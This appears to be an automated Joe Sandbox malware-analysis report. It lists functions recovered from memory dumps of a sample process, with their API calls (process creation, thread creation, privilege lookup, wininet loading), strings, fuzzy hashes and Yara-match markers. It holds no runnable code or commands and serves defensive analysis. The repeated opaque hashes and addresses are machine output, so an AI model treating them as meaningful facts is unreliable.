Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c158b244752995f3703547e30e111aec8e72361a8be363a484aaa1a53aa2122
Instruction ID: 7af71c24ef2a87bc0ea1a4f3946fe69c42b79c7307ab2d69657ea0be0843d0ba
Opcode Fuzzy Hash: 7c158b244752995f3703547e30e111aec8e72361a8be363a484aaa1a53aa2122
Instruction Fuzzy Hash: CD900225211400032515B5581704607005687D5395351C425F1006664CD631D8617221

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2A8A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2ca8cdbe0a0a61dfb8e1854dff518193c319bfc5db5e4d46630972f54102cb6
Instruction ID: b53697c8b34e60b494c49e7360af1a09f08c23fcdf8d8b3194b93457f8f5facb
Opcode Fuzzy Hash: d2ca8cdbe0a0a61dfb8e1854dff518193c319bfc5db5e4d46630972f54102cb6
Instruction Fuzzy Hash: 2790026120240003651571585514716401A87E0345B51C425F10056A4DC535D8917225

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2BCA

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8266452ded1fd428bc69b17b8c875fcaba2832a6f5fae6bf44c1db5182b161a1
Instruction ID: 01c9be607833e621f244daeeac326d3281a3adc4f89312313bdfa1e5fb232c90
Opcode Fuzzy Hash: 8266452ded1fd428bc69b17b8c875fcaba2832a6f5fae6bf44c1db5182b161a1
Instruction Fuzzy Hash: 5490023120140402F51075986508746001587E0345F51D415B5015669EC675D8917231

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2B8A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1d4b6959ef44f199a15d49341f3f033ca430cc22823a91a79f3a0cdf9a6cd62
Instruction ID: b3e212b6c87abef956f5350442ee383f5c52d1f2c5f17d80bccc75895a6d19f7
Opcode Fuzzy Hash: d1d4b6959ef44f199a15d49341f3f033ca430cc22823a91a79f3a0cdf9a6cd62
Instruction Fuzzy Hash: F390023120140842F51071585504B46001587E0345F51C41AB0115768DC625D8517621

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2B9A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae687c52656067dff90adeefba2b67aa0f7cf5544aaa8dda5d6ee279d326f39d
Instruction ID: 1ed2b5b92d2a4ed02e09adf5d834d2110a99bdf464eaa6322723140dc7a23794
Opcode Fuzzy Hash: ae687c52656067dff90adeefba2b67aa0f7cf5544aaa8dda5d6ee279d326f39d
Instruction Fuzzy Hash: 9D90023120148802F5207158950474A001587D0345F55C815B441576CDC6A5D8917221

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2B0A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 560a7f0ecbd525177bd487d4bbfbdaebf43398cee4886a1327325887c54ed12e
Instruction ID: 89361759075e5e7c3101cdf6ba9e91c923a49234d03d17bc01e010847ad4ccab
Opcode Fuzzy Hash: 560a7f0ecbd525177bd487d4bbfbdaebf43398cee4886a1327325887c54ed12e
Instruction Fuzzy Hash: C390023120544842F55071585504B46002587D0349F51C415B00557A8DD635DD55B761

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2B1A

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bad62a251154eaa4eb817bd433d14ba729126b96f095fe40f09e0eb6c9553af
Instruction ID: edf95b3b865f538854d0f476f25350dbb18c105769484db860f21f9cb6bb4009
Opcode Fuzzy Hash: 9bad62a251154eaa4eb817bd433d14ba729126b96f095fe40f09e0eb6c9553af
Instruction Fuzzy Hash: 0890023120140802F5907158550474A001587D1345F91C419B0016768DCA25DA5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 04CF34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF34EA

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41efe9288042c908f79e7ced6afbc7a57b3b296641cdc4d4924449224e017bcc
Instruction ID: 2eee7fca96601f16a3ca4c1adf21aacb84adc73b122e42bf0f098d10a25a5c84
Opcode Fuzzy Hash: 41efe9288042c908f79e7ced6afbc7a57b3b296641cdc4d4924449224e017bcc
Instruction Fuzzy Hash: 0F90023160550402F51071585614706101587D0345F61C815B041567CDC7A5D95176A2

Uniqueness

Uniqueness Score: -1.00%

Function 02B29070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02B29118

Strings

net.dll, xrefs: 02B290E1, 02B29167, 02B2913F, 02B2914B, 02B29173
wininet.dll, xrefs: 02B290CE, 02B290D7

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: beac73820a56b9bac90a8a7dda45371a7339f559430a01e560da52ab87f63015
Instruction ID: 1b2148bf6c182007d4d04a3c9cb6c6d69211d01a3ed0d2a92e0fc7c511294d89
Opcode Fuzzy Hash: beac73820a56b9bac90a8a7dda45371a7339f559430a01e560da52ab87f63015
Instruction Fuzzy Hash: 2731AFB2900754BBC724DF65C885FA7B7B9FB48B01F10845DE62E6B244DB30A654CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B29066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02B29118

Strings

net.dll, xrefs: 02B290E1, 02B2913F, 02B2914B
wininet.dll, xrefs: 02B290CE, 02B290D7

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 30fe42107113bb90865b8eace3125aeb983650cfe8eb09e99419e14829415d19
Instruction ID: 9e1206af04d6337e52328e3a6b5562826538006fb86b79abf174dd6423c26baf
Opcode Fuzzy Hash: 30fe42107113bb90865b8eace3125aeb983650cfe8eb09e99419e14829415d19
Instruction Fuzzy Hash: 5B2143B2A00710BBC724EF65C884FA7B7B5FB48700F1084ACE62DAB245CB30A554CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B13AF8), ref: 02B2A68D

Strings

.z`, xrefs: 02B2A67C, 02B2A688

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 000deff5e65f910ef10bd6b89f6027ecee68f0866502698eca5f7146a28515c4
Instruction ID: 9337c15fb42467e042f96254078a87bc82156f40ff0274cb9867e64da78b2fac
Opcode Fuzzy Hash: 000deff5e65f910ef10bd6b89f6027ecee68f0866502698eca5f7146a28515c4
Instruction Fuzzy Hash: 7FE039B2610214BBCB24DF65DC45EEB7768EF883A0F118189F91CA7241D631E900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B13AF8), ref: 02B2A68D

Strings

.z`, xrefs: 02B2A67C, 02B2A688

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 1f06af9e07fb85655dccfb4c2430ead8773c4e4d57f6cacb9fb8039e6859df40
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 0EE01AB12102146BD714DF59CC44EA777ADAF88750F014554B91C57241C630E9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02B18308 Relevance: 3.1, APIs: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B1836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B1838B

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 31f448e6930bf498ab7fcf4aa31a6a3578088f79db4a1caf4fdd14d430d4a3d2
Instruction ID: e4fa480b73d94e8517ec08e3dba9d8566b313f337c7535051386208b1d802653
Opcode Fuzzy Hash: 31f448e6930bf498ab7fcf4aa31a6a3578088f79db4a1caf4fdd14d430d4a3d2
Instruction Fuzzy Hash: 5E01F9719803287BF721A6949C42FBF776CAB41B50F094294FF04BA1C1E7946A0547F1

Uniqueness

Uniqueness Score: -1.00%

Function 02B182D3 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B1836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B1838B

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8eb4990325fd24e63c09389d55fce88a332833a5431b185dc4f25e916ca3cf1e
Instruction ID: c8bea04b99ad18048708887679797f4481fb089d665b880eccc613c209ea7b1d
Opcode Fuzzy Hash: 8eb4990325fd24e63c09389d55fce88a332833a5431b185dc4f25e916ca3cf1e
Instruction Fuzzy Hash: AB017031A4132876F72166945C02FFE7B6DAF41B14F080598FF04BB1C1D694250A47F1

Uniqueness

Uniqueness Score: -1.00%

Function 02B18310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B1836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B1838B

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: 2bd3835060ac9bbac94e1d228831d6ebe130b6a616e2adbcfcc8195e5878b74c
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: 3701F731A8032877E720A6949C02FBE772CAB00B50F084154FF04BA1C1E69479054BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02B1F6F1 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008003,?,02B18D14,?), ref: 02B1F6EB

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5506c29575af367be1a41aae1a63a11b804252031ea9c57b0ddcaa917557560d
Instruction ID: ffdb63c0eec87c1356694cf155a31a4c8c81071a9a0f94ceb9d6fae9cac6bac1
Opcode Fuzzy Hash: 5506c29575af367be1a41aae1a63a11b804252031ea9c57b0ddcaa917557560d
Instruction Fuzzy Hash: 6701F571A443082AFB20FBA48C45FBB73A99F55704F0405D8F91CD7282EAA0A9848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B1ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B1AD52

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 8e0b4382acc7e56be1bbe647b0402e2c15ce3a94acf96b4426fcde28545b6144
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: B8011EB5D4020DABDB10EAA4DD41F9EB7799B54308F1041D5E91C97240FA31E719CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B2A724

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: deb5048618a61709c954b8329e52cbdca654bfe1aee24416d65e2d1c03b6164d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: FC01B2B2210208BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A692 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B13AF8), ref: 02B2A68D

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 07ae0a83b265b9510de18d793e96a2bfdbe8ee5d3550a51959216930747e1b6a
Instruction ID: 18d4a75b7b1ad9224711f03e7423436c09b58842175efa2b431b86e9900cc804
Opcode Fuzzy Hash: 07ae0a83b265b9510de18d793e96a2bfdbe8ee5d3550a51959216930747e1b6a
Instruction Fuzzy Hash: 8AF08C726102247FE724EF98DC84EEB739DEF89350F1586A5F60C5B241C635A9098BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B29193 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B1F040,?,?,00000000), ref: 02B291DC

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 569a6075d558e6162664151ccebed9b042a398482b9557b92f02e60807001ad4
Instruction ID: f8d7a684c23316b87e95ba27730c4ff2c10281dd5bd21855278a8d4e936f791e
Opcode Fuzzy Hash: 569a6075d558e6162664151ccebed9b042a398482b9557b92f02e60807001ad4
Instruction Fuzzy Hash: E8F0EC376807203AF33055598C42FE77768DB81B50F640169FB4DAB1C1C6A4F8068AA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B291A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B1F040,?,?,00000000), ref: 02B291DC

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d10c338030a63e1013b910e3c2063ff447c03e609e320231460ab1a77d3652e7
Instruction ID: a0b7ec38eb6170bb82072a1d354591d4df0aaad397d2c880d233713b81a7c6ff
Opcode Fuzzy Hash: d10c338030a63e1013b910e3c2063ff447c03e609e320231460ab1a77d3652e7
Instruction Fuzzy Hash: 6CE092333903243AE3306599AC02FA7B39CDB81B61F140066FB4DEB6C0D595F40546A4

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02B1F1C2,02B1F1C2,?,00000000,?,?), ref: 02B2A7F0

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d0ba2a6c9b03dfdcb9415e01af40c58c376dc1d9d446cf8b57bdbed0a2ae8c20
Instruction ID: 51b9c6e2798b237ee1eedd46f5f767181bcaf148ebb3c75c5ddf10a2830f9fa3
Opcode Fuzzy Hash: d0ba2a6c9b03dfdcb9415e01af40c58c376dc1d9d446cf8b57bdbed0a2ae8c20
Instruction Fuzzy Hash: B4F0EDB5200258AFDB10DF54CC80FEB7BAAEF49310F118184FD8D97682DA30E816CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02B24526,?,02B24C9F,02B24C9F,?,02B24526,?,?,?,?,?,00000000,00000000,?), ref: 02B2A64D

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 87d6cfeb59f1e03609279e61834f00f1426d2e8005a916ea93f7970fcb6a40c2
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 2CE012B2210218ABDB14EF99CC40EA777ADAF88654F118598BA1C9B241C630F9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02B1F1C2,02B1F1C2,?,00000000,?,?), ref: 02B2A7F0

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 70e1deccaaffcb9bcc32da969ac74456741346b5f4c39a8fcef48277928ac3cc
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 91E01AB12002186BDB10DF49CC84EE737ADAF88650F018154BA0C57241C934E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02B1F6B8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02B18D14,?), ref: 02B1F6EB

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a93da67b593810d0bed12bdaf9779deb83a6657171afce67af401a22746db5df
Instruction ID: 2bafda129b7fb5dd77994ea6923afb30fd3d1e96865eceeeecc626d0822e174b
Opcode Fuzzy Hash: a93da67b593810d0bed12bdaf9779deb83a6657171afce67af401a22746db5df
Instruction Fuzzy Hash: CED02E326803003BFA20FEE8CC42F2A26CAAB60208F1804B0F58CE7AC3D950D0008420

Uniqueness

Uniqueness Score: -1.00%

Function 02B1F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02B18D14,?), ref: 02B1F6EB

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: e08edf3334386adad4d7493e675765c7eeaa52ec5d6c671da9acdeeeadaab168
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 67D05E626503042BE610FAA89C02F2632899B54A04F4900B4F948972C3D954E0008565

Uniqueness

Uniqueness Score: -1.00%

Function 02B2A831 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02B1F1C2,02B1F1C2,?,00000000,?,?), ref: 02B2A7F0

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a2f105bc1e74d9d70f615b716723ad0135a3d21058889328619839b10f3c7fdd
Instruction ID: 1d130cf76205ff893b8c8e17ce5e88ca6c71e05da211f431f461196c2650ed24
Opcode Fuzzy Hash: a2f105bc1e74d9d70f615b716723ad0135a3d21058889328619839b10f3c7fdd
Instruction Fuzzy Hash: 22C02B3630013045C220F7B4EC004EBF329EBC83403608641EA4C031058133840E0590

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2B44

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f4526973605ce195b6f3b69aa12e09a5f1cb3bc0ccbb27daeb8f49cd9b4df65
Instruction ID: 4c12da20c89b231ab1df33826e014c7ae1249bf0b0a7c2d4434997b619306042
Opcode Fuzzy Hash: 1f4526973605ce195b6f3b69aa12e09a5f1cb3bc0ccbb27daeb8f49cd9b4df65
